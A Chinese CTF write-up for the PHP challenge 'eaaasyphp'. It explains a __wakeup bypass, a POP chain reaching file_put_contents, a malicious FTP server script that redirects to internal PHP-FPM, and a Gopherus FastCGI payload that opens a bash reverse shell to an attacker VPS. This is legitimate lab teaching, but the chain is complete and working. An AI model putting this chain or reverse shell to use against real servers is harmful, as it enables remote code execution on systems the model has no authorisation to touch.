eaaasyphp
文章目錄
- eaaasyphp
- 讀取phpinfo
- 打fastcgi
- 惡意的ftp服務
- 構造pop鏈
- 參考鏈接
題目給出了原始碼
讀取phpinfo
嘗試反序列化讀取phpinfo
但是__wakeup()函式先于destruct函式執行,所以需要繞過:__
PHP :: Bug #81151 :: bypass __wakeup
?code=C:4:"Hint":0:{}
注意這個FPM/FastCGI
打fastcgi
使用Gopherus生成打fastcgi的payload:
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_
PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCR
IPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp
/vps/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
同時還要在自己的vps上起一個惡意的ftp服務
惡意的ftp服務
ftp服務
# evil_ftp.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 7008))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()
構造pop鏈
構造pop鏈觸發Bunny類中的file_put_contents
unserialize——>Bypass類的__destruct()函式——>Welcome類的__invoke()函式——>Bunny類的__toString()函式——>呼叫其file_put_contents()打內網的fpm
(vps自行修改)
<?php
class Check {
public static $str1 = false;
public static $str2 = false;
}
class Esle {
public function __wakeup()
{
Check::$str1 = true;
}
}
class Hint {
public function __wakeup(){
$this->hint = "no hint";
}
//這里可以利用得到phpinfo(),前提是繞過__wakeup(),將O換為C即可繞過
public function __destruct(){
if(!$this->hint){
$this->hint = "phpinfo";
($this->hint)();
}
}
}
class Bunny {
//當一個物件被當作字串對待的時候,會觸發這個__toString()魔術方法
//比如$b = new Bunny();那么 echo $b; 就會呼叫__toString這個方法
public function __toString()
{
if (Check::$str2) {
if(!$this->data){
$this->data = $_REQUEST['data'];
}
//寫入檔案 但是題目把寫檔案的權限給刪掉了,所以這個思路不通
//可以配合ftp打內網的fpm
file_put_contents($this->filename, $this->data);
} else {
throw new Error("Error");
}
}
}
class Welcome {
//當以呼叫函式的方式,呼叫一個物件時,__invoke函式會被自動呼叫
//比如$a = new Welcome(),那么進行 $a()的時候就會呼叫__invoke()函式
//而上述用法可以在Bypass中進行利用
public function __invoke()
{
Check::$str2 = true;
return "Welcome" . $this->username;
}
}
class Bypass {
public $aaa;
public function __destruct()
{
if (Check::$str1) {
//另str4為一個Welcome的類物件,呼叫其__invoke()函式
($this->str4)();
} else {
throw new Error("Error");
}
}
}
$a = new Bypass();
$a->aaa = new Esle();
$a->str4 = new Welcome();
$a->str4->username = new Bunny();
$a->str4->username->filename = "ftp://aaa@vps:7008/123";
echo urlencode(serialize($a));
/*
if (isset($_GET['code'])) {
unserialize($_GET['code']);
} else {
highlight_file(__FILE__);
}*/
打內網的fpm這一點類似于[藍帽杯2021 one point php]:[藍帽杯 2021]One Pointer PHP_Sk1y的博客-CSDN博客
payload(vps自行修改)
?code=O%3A6%3A%22Bypass%22%3A2%3A%7Bs%3A3%3A%22aaa%22%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7Ds%3A4%3A%22str4%22%3BO%3A7%3A%22Welcome%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A5%3A%22Bunny%22%3A1%3A%7Bs%3A8%3A%22filename%22%3Bs%3A33%3A%22ftp%3A%2F%2Faaa%40116.62.240.148%3A7008%2F123%22%3B%7D%7D%7D&data=%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/vps/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
運行ftp.py,在vps的7008埠開啟ftp惡意服務
python3 ftp.py
監聽vps的7777埠,
參考鏈接
- PHP :: Bug #81151 :: bypass __wakeup
- 隴原戰疫2021網路安全大賽 Web_feng的博客-CSDN博客
- One Pointer PHP_Sk1y的博客-CSDN博客
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/394161.html
標籤:其他